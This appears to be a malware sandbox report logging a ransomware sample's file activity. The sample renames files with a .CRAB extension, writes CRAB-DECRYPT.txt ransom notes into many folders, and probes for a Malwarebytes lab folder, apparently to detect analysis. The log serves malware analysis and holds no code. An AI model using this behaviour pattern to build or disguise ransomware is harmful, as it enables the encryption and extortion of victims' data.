Create C:\588bce7c90097ed212\1041\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1041\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1042\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1042\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1042\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1043\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1043\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1043\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1044\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1044\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1044\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1045\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1045\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1045\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1046\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1046\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1046\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1049\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1049\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1049\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1053\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1053\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1053\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1055\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1055\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1055\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\2052\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\2052\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\2052\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\2070\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\2070\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\2070\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\3076\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\3076\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\3076\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\3082\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\3082\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\3082\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\Client\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\Client\Parameterinfo.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\Client\UiInfo.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\DHtmlHeader.html.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\Extended\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\Extended\Parameterinfo.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\Extended\UiInfo.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\header.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\netfx_Core.mzz.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Get Info C:\MalwarebytesLABs type = file_attributes False 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe type = size True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe type = size True 1
Fn
Get Info C:\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log type = file_attributes True 1
Fn
Get Info C:\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log type = file_attributes True 1
Fn
Get Info C:\$GetCurrent\Logs\PartnerSetupCompleteResult.log type = file_attributes True 1
Fn
Get Info C:\$GetCurrent\SafeOS\GetCurrentRollback.ini type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1025\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1025\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1028\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1028\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1029\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1029\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1030\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1030\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1031\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1031\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1032\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1032\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1033\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1033\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1035\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1035\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1036\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1036\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1037\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1037\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1038\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1038\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1040\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1040\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1041\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1041\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1042\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1042\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1043\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1043\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1044\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1044\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1045\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1045\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1046\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1046\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1049\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1049\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1053\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1053\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1055\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\1055\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\2052\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\2052\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\2070\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\2070\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\3076\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\3076\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\3082\eula.rtf type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\3082\LocalizedData.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\Client\Parameterinfo.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\Client\UiInfo.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\DHtmlHeader.html type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\Extended\Parameterinfo.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\Extended\UiInfo.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\header.bmp type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\netfx_Core.mzz type = file_attributes True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Move C:\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log.CRAB source_filename = C:\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log True 1
Fn
Move C:\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log.CRAB source_filename = C:\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log True 1
Fn
Move C:\$GetCurrent\Logs\PartnerSetupCompleteResult.log.CRAB source_filename = C:\$GetCurrent\Logs\PartnerSetupCompleteResult.log True 1
Fn
Move C:\$GetCurrent\SafeOS\GetCurrentRollback.ini.CRAB source_filename = C:\$GetCurrent\SafeOS\GetCurrentRollback.ini True 1
Fn
Move C:\588bce7c90097ed212\1025\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1025\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1025\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1025\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1028\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1028\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1028\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1028\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1029\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1029\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1029\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1029\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1030\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1030\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1030\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1030\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1031\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1031\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1031\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1031\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1032\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1032\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1032\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1032\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1033\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1033\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1033\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1033\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1035\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1035\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1035\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1035\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1036\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1036\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1036\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1036\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1037\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1037\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1037\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1037\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1038\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1038\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1038\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1038\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1040\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1040\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1040\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1040\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1041\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1041\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1041\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1041\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1042\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1042\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1042\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1042\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1043\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1043\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1043\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1043\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1044\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1044\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1044\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1044\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1045\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1045\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1045\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1045\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1046\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1046\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1046\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1046\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1049\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1049\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1049\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1049\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1053\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1053\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1053\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1053\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\1055\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\1055\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\1055\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\1055\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\2052\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\2052\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\2052\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\2052\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\2070\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\2070\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\2070\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\2070\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\3076\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\3076\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\3076\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\3076\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\3082\eula.rtf.CRAB source_filename = C:\588bce7c90097ed212\3082\eula.rtf True 1
Fn
Move C:\588bce7c90097ed212\3082\LocalizedData.xml.CRAB source_filename = C:\588bce7c90097ed212\3082\LocalizedData.xml True 1
Fn
Move C:\588bce7c90097ed212\Client\Parameterinfo.xml.CRAB source_filename = C:\588bce7c90097ed212\Client\Parameterinfo.xml True 1
Fn
Move C:\588bce7c90097ed212\Client\UiInfo.xml.CRAB source_filename = C:\588bce7c90097ed212\Client\UiInfo.xml True 1
Fn
Move C:\588bce7c90097ed212\DHtmlHeader.html.CRAB source_filename = C:\588bce7c90097ed212\DHtmlHeader.html True 1
Fn
Move C:\588bce7c90097ed212\Extended\Parameterinfo.xml.CRAB source_filename = C:\588bce7c90097ed212\Extended\Parameterinfo.xml True 1
Fn
Move C:\588bce7c90097ed212\Extended\UiInfo.xml.CRAB source_filename = C:\588bce7c90097ed212\Extended\UiInfo.xml True 1
Fn
Move C:\588bce7c90097ed212\header.bmp.CRAB source_filename = C:\588bce7c90097ed212\header.bmp True 1
Fn
Move C:\588bce7c90097ed212\netfx_Core.mzz.CRAB source_filename = C:\588bce7c90097ed212\netfx_Core.mzz True 1
Fn
Read C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 261128, size_out = 261128 True 1
Fn
Data
Read - size = 4096, size_out = 35 True 1
Fn
Data
Read - size = 4096, size_out = 316 True 1
Fn
Data
Read C:\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log.CRAB size = 1048576, size_out = 42674 True 1
Fn
Data
Read C:\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log.CRAB size = 1048576, size_out = 6004 True 1
Fn
Data
Read C:\$GetCurrent\Logs\PartnerSetupCompleteResult.log.CRAB size = 1048576, size_out = 40 True 1
Fn
Data
Read C:\$GetCurrent\SafeOS\GetCurrentRollback.ini.CRAB size = 1048576, size_out = 156 True 1
Fn
Data
Read C:\588bce7c90097ed212\1025\eula.rtf.CRAB size = 1048576, size_out = 7567 True 1
Fn
Data
Read C:\588bce7c90097ed212\1025\LocalizedData.xml.CRAB size = 1048576, size_out = 74214 True 1
Fn
Data
Read C:\588bce7c90097ed212\1028\eula.rtf.CRAB size = 1048576, size_out = 6309 True 1
Fn
Data
Read C:\588bce7c90097ed212\1028\LocalizedData.xml.CRAB size = 1048576, size_out = 60816 True 1
Fn
Data
Read C:\588bce7c90097ed212\1029\eula.rtf.CRAB size = 1048576, size_out = 3726 True 1
Fn
Data
Read C:\588bce7c90097ed212\1029\LocalizedData.xml.CRAB size = 1048576, size_out = 80970 True 1
Fn
Data
Read C:\588bce7c90097ed212\1030\eula.rtf.CRAB size = 1048576, size_out = 3314 True 1
Fn
Data
Read C:\588bce7c90097ed212\1030\LocalizedData.xml.CRAB size = 1048576, size_out = 77748 True 1
Fn
Data
Read C:\588bce7c90097ed212\1031\eula.rtf.CRAB size = 1048576, size_out = 3419 True 1
Fn
Data
Read C:\588bce7c90097ed212\1031\LocalizedData.xml.CRAB size = 1048576, size_out = 82346 True 1
Fn
Data
Read C:\588bce7c90097ed212\1032\eula.rtf.CRAB size = 1048576, size_out = 8876 True 1
Fn
Data
Read C:\588bce7c90097ed212\1032\LocalizedData.xml.CRAB size = 1048576, size_out = 86284 True 1
Fn
Data
Read C:\588bce7c90097ed212\1033\eula.rtf.CRAB size = 1048576, size_out = 3188 True 1
Fn
Data
Read C:\588bce7c90097ed212\1033\LocalizedData.xml.CRAB size = 1048576, size_out = 77232 True 1
Fn
Data
Read C:\588bce7c90097ed212\1035\eula.rtf.CRAB size = 1048576, size_out = 3702 True 1
Fn
Data
Read C:\588bce7c90097ed212\1035\LocalizedData.xml.CRAB size = 1048576, size_out = 77022 True 1
Fn
Data
Read C:\588bce7c90097ed212\1036\eula.rtf.CRAB size = 1048576, size_out = 3526 True 1
Fn
Data
Read C:\588bce7c90097ed212\1036\LocalizedData.xml.CRAB size = 1048576, size_out = 82962 True 1
Fn
Data
Read C:\588bce7c90097ed212\1037\eula.rtf.CRAB size = 1048576, size_out = 6851 True 1
Fn
Data
Read C:\588bce7c90097ed212\1037\LocalizedData.xml.CRAB size = 1048576, size_out = 72076 True 1
Fn
Data
Read C:\588bce7c90097ed212\1038\eula.rtf.CRAB size = 1048576, size_out = 4254 True 1
Fn
Data
Read C:\588bce7c90097ed212\1038\LocalizedData.xml.CRAB size = 1048576, size_out = 86442 True 1
Fn
Data
Read C:\588bce7c90097ed212\1040\eula.rtf.CRAB size = 1048576, size_out = 3643 True 1
Fn
Data
Read C:\588bce7c90097ed212\1040\LocalizedData.xml.CRAB size = 1048576, size_out = 80060 True 1
Fn
Data
Read C:\588bce7c90097ed212\1041\eula.rtf.CRAB size = 1048576, size_out = 10125 True 1
Fn
Data
Read C:\588bce7c90097ed212\1041\LocalizedData.xml.CRAB size = 1048576, size_out = 68226 True 1
Fn
Data
Read C:\588bce7c90097ed212\1042\eula.rtf.CRAB size = 1048576, size_out = 12687 True 1
Fn
Data
Read C:\588bce7c90097ed212\1042\LocalizedData.xml.CRAB size = 1048576, size_out = 65238 True 1
Fn
Data
Read C:\588bce7c90097ed212\1043\eula.rtf.CRAB size = 1048576, size_out = 3546 True 1
Fn
Data
Read C:\588bce7c90097ed212\1043\LocalizedData.xml.CRAB size = 1048576, size_out = 79634 True 1
Fn
Data
Read C:\588bce7c90097ed212\1044\eula.rtf.CRAB size = 1048576, size_out = 3046 True 1
Fn
Data
Read C:\588bce7c90097ed212\1044\LocalizedData.xml.CRAB size = 1048576, size_out = 79296 True 1
Fn
Data
Read C:\588bce7c90097ed212\1045\eula.rtf.CRAB size = 1048576, size_out = 4040 True 1
Fn
Data
Read C:\588bce7c90097ed212\1045\LocalizedData.xml.CRAB size = 1048576, size_out = 82374 True 1
Fn
Data
Read C:\588bce7c90097ed212\1046\eula.rtf.CRAB size = 1048576, size_out = 3683 True 1
Fn
Data
Read C:\588bce7c90097ed212\1046\LocalizedData.xml.CRAB size = 1048576, size_out = 80738 True 1
Fn
Data
Read C:\588bce7c90097ed212\1049\eula.rtf.CRAB size = 1048576, size_out = 54456 True 1
Fn
Data
Read C:\588bce7c90097ed212\1049\LocalizedData.xml.CRAB size = 1048576, size_out = 81482 True 1
Fn
Data
Read C:\588bce7c90097ed212\1053\eula.rtf.CRAB size = 1048576, size_out = 3865 True 1
Fn
Data
Read C:\588bce7c90097ed212\1053\LocalizedData.xml.CRAB size = 1048576, size_out = 77680 True 1
Fn
Data
Read C:\588bce7c90097ed212\1055\eula.rtf.CRAB size = 1048576, size_out = 3859 True 1
Fn
Data
Read C:\588bce7c90097ed212\1055\LocalizedData.xml.CRAB size = 1048576, size_out = 76818 True 1
Fn
Data
Read C:\588bce7c90097ed212\2052\eula.rtf.CRAB size = 1048576, size_out = 5827 True 1
Fn
Data
Read C:\588bce7c90097ed212\2052\LocalizedData.xml.CRAB size = 1048576, size_out = 60684 True 1
Fn
Data
Read C:\588bce7c90097ed212\2070\eula.rtf.CRAB size = 1048576, size_out = 4015 True 1
Fn
Data
